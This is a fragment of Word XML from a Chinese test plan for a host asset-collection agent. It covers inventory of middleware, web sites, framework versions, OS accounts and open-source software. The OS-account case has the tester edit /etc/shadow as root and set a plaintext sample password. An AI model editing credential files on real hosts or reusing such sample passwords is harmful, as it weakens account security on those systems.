              <w:t>/Oracle/Middleware/user_projects/domains/base_domain/bin/startWebLogic.sh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>nginx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属主机—Redhat-67-01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/nginx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:t>1.12.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动文件路径—/home/</w:t>
            </w:r>
            <w:r>
              <w:t>soft/nginx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/sbin/nginx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支持采集apache   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      支持采集tomcat   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      支持采集weblogic  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      支持采集nginx     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">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79" w:name="_Toc1198"/>
      <w:bookmarkStart w:id="80" w:name="_Toc2397744"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Web站点信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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Web站点采集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cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>能够识别出所有运行的Web站点，包括该站点的域名、安装路径等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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w:t>ent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>预先在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/home/soft/tomcat/webapps下放一个test站点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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsi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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的网站功能，即可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能够识别出所有运行的Web站点，包括该站点的域名、安装路径等</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>站点域名</w:t>
            </w:r>
            <w:r>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r>
              <w:t>host:8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装路径--/home/soft/tomcat/webapps/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81" w:name="_Toc5063"/>
      <w:bookmarkStart w:id="82" w:name="_Toc1644177762"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Web框架信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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Web框架采集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cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>能够识别出所有Web站点中使用的框架，并且识别出框架版本、使用该web框架的web应用的路径等信息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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsi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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>查看主机资产中的web框架功能，即可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能够识别出所有Web站点中使用的框架</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Struts2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：2.5.12</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径：/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：4.1.9</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径：/home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Fastjson</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：1.2.37</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：/home/soft/tomcat/webapps/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支持采集struts2  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     支持采集spring  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     支持采集fastjson </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc2023559985"/>
      <w:bookmarkStart w:id="84" w:name="_Toc17185"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>操作系统账号信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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操作系统账号信息采集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支持采集主机上的账号信息，可采集账号的用户名、是否Root权限、上次登录时间、所属用户组、密码过期时间、上次密码修改时间；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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预先安装ag</w:t>
            </w:r>
            <w:r>
              <w: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pPr>
              <w:pStyle w:val="74"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minor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74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>Oracle-76-01上登录root后执行useradd test新建用户test，执行passwd test根据提示修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>密码为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>ccb@test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>执行su - test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>执行exit，退回到root账户下vi /etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 找到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>的密码过期字段</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>（第五个字段）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>修改为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="74"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Arial" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>重新采集资产</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"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支持采集主机上的test账号信息:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号的是否root权限显示为：否</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号上次登录时间为步骤2操作时的时间</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所属用户组为test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号密码过期时间为测试日期往后推的500天</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test帐号上次修改密码的时间为步骤1操作的时间</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85" w:name="_Toc274150356"/>
      <w:bookmarkStart w:id="86" w:name="_Toc30161"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开源软件信息采集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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开源软件采集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支持采集主机上的开源软件信息，可采集软件名、版本、路径信息等信息，开源软件包括：Apache solr，kibana、kubernetes等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t>安装Apache solr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:t>kibana</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:t>kubernetes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rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>查看资产采集模块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t>Apache solr</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：8.1.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> /home/soft/tomcat/webapps/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Kibana</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：5.6.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>/home/soft/kibana</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>Kubernetes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：1.16.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>安装路径</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>/usr/bin/minikube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t>Apache solr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Kibana</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Kubernetes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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87" w:name="_Toc1292610477"/>
      <w:bookmarkStart w:id="88" w:name="_Toc22392"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>网络访问信息采集及</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:t>可视化</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="27"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpX="108" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>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cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>网络访问信息采集及可视化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cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Arial"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>能够以流量线以及可视化方式显示所有访问Agent所在主机的互访关系，并形成访问关系拓扑图，拓扑图需显示主机信息、访问流量线、以及主机分组相关信息。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cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>能够根据实际业务，用位置、环境和应用三个标签创建工作组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>group1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>—位置：北京</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>环境：测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
